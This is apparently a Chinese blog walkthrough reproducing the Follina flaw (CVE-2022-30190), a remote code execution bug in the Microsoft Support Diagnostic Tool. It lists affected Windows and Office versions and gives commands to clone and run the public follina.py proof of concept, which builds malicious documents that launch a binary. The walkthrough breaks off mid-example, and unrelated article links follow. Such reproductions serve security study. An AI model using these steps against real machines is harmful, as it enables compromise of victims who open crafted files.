文章目录

  • 免责声明
  • 前言
  • 一、漏洞简介
    • 风险等级评判
  • 二、影响版本
    • office版本
  • 三、漏洞复现
    • 复现环境
    • 工具
    • 使用方法
    • 利用
      • 第一种
      • 第二种
  • 防范避免
  • 结尾
  • 参考

免责声明

本文章仅供学习和研究使用,严禁使用该文章内容对互联网其他应用进行非法操作,若将其用于非法目的,所造成的后果由您自行承担,产生的一切风险与本文作者无关,如继续阅读该文章即表明您默认遵守该内容。

前言

MS Office docx 文件可能包含作为 HTML 文件的外部 OLE 对象引用。有一个 HTML 场景 ms-msdt: 调用 msdt 诊断工具,它能够执行任意代码(在参数中指定)。
结果是一个可怕的攻击向量,通过打开恶意 docx 文件(不使用宏)来获取 RCE。
通俗来说就是调用远程html文件来执行任意代码。

一、漏洞简介

CVE: CVE-2022-30190

组件: Microsoft Windows Support Diagnostic Tool(MSDT) Windows

漏洞类型: 代码执行

影响: 服务器接管

简述: 从 Word 等调用应用程序使用 URL 协议调用 MSDT 时存在远程执行代码漏洞。成功利用此漏洞的攻击者可以使用调用应用程序的权限运行任意代码。然后,攻击者可以安装程序、查看、更改或删除数据,或者在用户权限允许的上下文中创建新帐户。

风险等级评判

2022年06月01日,微软官方发布了Microsoft Windows Support Diagnostic Tool(MSDT)的风险通告,漏洞编号为CVE-2022-30190,漏洞等级:高危,漏洞评分:7.8。目前,该漏洞的漏洞细节与POC均已公开,已发现在野利用。目前,该漏洞暂无官方补丁
360CERT对该漏洞的评定结果如下:

评定方式 等级
威胁等级 高危
影响面 广泛
攻击者价值
利用难度
360CERT评分 7.8

二、影响版本

几乎可以说覆盖所有常用的windows操作系统了,可见这个漏洞还是非常危险的

Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows RT 8.1

Windows 8.1 for x64-based systems

Windows 8.1 for 32-bit systems

Windows 7 for x64-based Systems Service Pack 1

Windows 7 for 32-bit Systems Service Pack 1

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows 10 Version 1607 for x64-based Systems

Windows 10 Version 1607 for 32-bit Systems

Windows 10 for x64-based Systems

Windows 10 for 32-bit Systems

Windows 10 Version 21H2 for x64-based Systems

Windows 10 Version 21H2 for ARM64-based Systems

Windows 10 Version 21H2 for 32-bit Systems

Windows 11 for ARM64-based Systems

Windows 11 for x64-based Systems

Windows Server, version 20H2 (Server Core Installation)

Windows 10 Version 20H2 for ARM64-based Systems

Windows 10 Version 20H2 for 32-bit Systems

Windows 10 Version 20H2 for x64-based Systems

Windows Server 2022 Azure Edition Core Hotpatch

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows 10 Version 21H1 for 32-bit Systems

Windows 10 Version 21H1 for ARM64-based Systems

Windows 10 Version 21H1 for x64-based Systems

Windows Server 2019 (Server Core installation)

Windows Server 2019

Windows 10 Version 1809 for ARM64-based Systems

Windows 10 Version 1809 for x64-based Systems

Windows 10 Version 1809 for 32-bit Systems

office版本

目前已知影响的版本为:

office 2021 Lts

office 2019

office 2016

Office 2013

Office ProPlus

Office 365

三、漏洞复现

说了这么多让我们开始复现吧

复现环境

版本: Windows 10 专业工作站版
版本号: 21H2
操作系统内部版本 19044.1741

kali-linux-2022.2-amd64

python 3及以上

工具

前面已经提到漏洞的poc已经在网上公开,所以我们使用此项目https://github.com/chvancooten/follina.py(点击直达)

由于GitHub非常的神奇,有的小伙伴经常打不开,所以这里是几个镜像克隆地址(在kali终端输入即可拉取)
克隆地址1

git clone https://hub.fastgit.xyz/chvancooten/follina.py.git

克隆地址2

git clone https://hub.0z.gs/chvancooten/follina.py.git

克隆地址3

git clone https://api.mtr.pub/chvancooten/follina.py.git

使用方法

首先进入poc的文件夹

cd follina.py/

提示:cd为命令,输入文件(夹)名按teb键可以自动补全,例:输入fo,按teb即可完成输入

使用python follina.py -h即可获取使用方法,如图:

知道你们看不懂,给你们中文翻译版(机翻)

选项:-h, --help            显示帮助信息并退出所需的参数:-m {command,binary}, --mode {command,binary}command:命令      binary:二进制 执行模式,可以是“二进制”加载一个(远程)二进制,或“命令”运行一个编码的PS命令二进制执行参数:-b BINARY, --binary BINARY要运行的二进制文件的完整路径。SMB共享可以是本地的或远程的命令执行参数:-c COMMAND, --command COMMAND以“命令”模式执行的编码命令可选参数:-t {rtf,docx}, --type {rtf,docx}使用的有效载荷类型,可以是“docx”或“rtf”-u URL, --url URL     生成的文档检索有效负载的主机名或IP地址,默认为“localhost”。如果指定了自定义URL方案或路径,则禁用web服务器-H HOST, --host HOST  web服务器监听的接口,默认为所有接口(0.0.0.0)-P PORT, --port PORT  PORT运行HTTP服务器的端口,默认为80

下面是一些我整理举的一些例子

例子:
# 执行本地二进制文件
python .\follina.py -m binary -b \windows\system32\calc.exe# 在linux上,需要转义反斜杠
python .\follina.py -m binary -b \\windows\\system32\\calc.exe# 从文件共享执行一个二进制文件(可用于农场哈希值												

CVE-2022-30190(follina):Microsoft诊断工具(MSDT)远程代码执行漏洞复现(超级详细)相关推荐

  1. Windows支持诊断工具(MSDT)远程代码执行漏洞(CVE-2022-30190)分析复现/修复

    前言 Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability对应的cve为CVE-20 ...

  2. CVE-2022-21907 Microsoft Windows HTTP 协议栈远程代码执行漏洞复现

    目录 0x01 声明: 0x02 简介: 0x03 漏洞概述: 0x04 影响版本: 0x05 环境搭建: 下载: 开启IIS: 0x06 漏洞复现: 利用POC: 0x07 流量分析: 客户端: 0 ...

  3. CVE-2022-30190 MSDT远程代码执行漏洞复现

    目录 0x01 声明: 0x02 简介: 0x03 漏洞概述: 0x04 影响版本: 0x05 环境搭建: 0x06 漏洞复现: 是否存在利用点: CMD执行: 生成docx文件利用: 0x07 CS ...

  4. 服务器2008操作系统漏洞,【操作系统安全漏洞 】解决CVE-2017-11780:Microsoft Windows SMB Server远程代码执行漏洞...

    一.漏洞描述 2017年10月10日,微软漏洞补丁日修复了多个安全漏洞,其中一个为Microsoft WindowsSMB Server远程执行代码漏洞,根据官方描述该漏洞如果被成功利用,远程攻击者可 ...

  5. CVE-2022-30190分析以及复现和POC利用 //Microsoft Office MSDT 远程代码执行漏洞

    CVE-2022-30190 https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-supp ...

  6. Struts2 远程代码执行漏洞复现(附Struts2漏洞检测工具)

    0x00 Struts2 简介 Struts2 是 Apache 软件组织推出的一个相当强大的 Java Web 开源框架,本质上相当于一个 servlet.Struts2 基于 MVC 架构,框架结 ...

  7. 【漏洞复现】Microsoft Office MSDT 远程代码执行漏洞 (CVE-2022-30190)

    0x01 Microsoft Office Microsoft Office是由Microsoft(微软)公司开发的一套办公软件套装.常用组件有 Word.Excel.PowerPoint等. 0x0 ...

  8. Microsoft MSDT任意代码执行漏洞(CVE-2022-30190)

    Microsoft Windows 支持诊断工具 (MSDT) 远程代码执行漏洞复现过程 漏洞描述 MSDT(Microsoft Support Diagnostics Tool,微软支持诊断工具)是 ...

  9. Struts2被曝远程代码执行漏洞;叮咚买菜抢菜工具;find替代方案…|叨资讯

    点击关注强哥,还有100多G的面试资料等你来拿 哈喽,大家好,我是强哥. Struts2被曝远程代码执行漏洞:Facebook开源文本编辑器库Lexical:PyCharm 2022.1 正式发布:一 ...

最新文章

  1. PHP 预编译加速: eAccelerator的安装和性能比较
  2. R语言保存加载工作空间或者工作空间数据对象实战(Save Load RData Workspace)
  3. linux高可用性,linux – 高可用性Cron Jobs
  4. LeetCode第14题:最长公共前缀
  5. 3.JDK和JRE和JVM的区别
  6. Eclipse Memory Analyzer分析内存使用总结
  7. disc性格测试cs适合职业_DISC性格测试,高C型的人适合从事什么工作?
  8. 服务器主机本地系统服务受限,Win10系统出现服务主机本地系统网络受限怎么办 如何解决...
  9. B. Shashlik Cooking
  10. java版12306抢票_J12306
  11. Python用socket、多线程实现一对一聊天室
  12. 使用 AndroidSocketClient 库建立 SSL 安全链接
  13. LED护眼灯真的可以护眼吗?2022专业护眼台灯品牌排行榜
  14. JavaSE学习笔记 详解Set集合中实现类:LinkedHashSet以及TreeSet
  15. Java练习题:算法(冒泡排序)
  16. 字符串分割【Java】
  17. mysql8.0.19中在navicat客户端中int、bigint等类型设置长度保存后为0
  18. 2022年嵌入式开发就业前景怎么样?
  19. Windows Server 2008 R2安装openSSH服务
  20. 剑指Offer(十九):顺时针打印矩阵

热门文章

  1. 百度地图 省市级三级行政区域显示(附带点聚合标记)
  2. 第一章:什么是英特网
  3. Hamiton图系列文章 (3) :Hamilton图的判定与实现
  4. XML操作类(Seaskyer)
  5. unity重定向_Unity 骨骼动画的运行时重定向
  6. 火星车初级java面向对象
  7. 经典C++笔试题目100例,接近实际,值得一看!
  8. npm 安装报错 rollbackFailedOptional verb npm-session 解决办法
  9. Android操作系统安全研究系列——键…
  10. 中山起湾周边学校有计算机吗,【趣味数据】乐有家:入学对口小区一直变?中山东区入学住哪里比较好...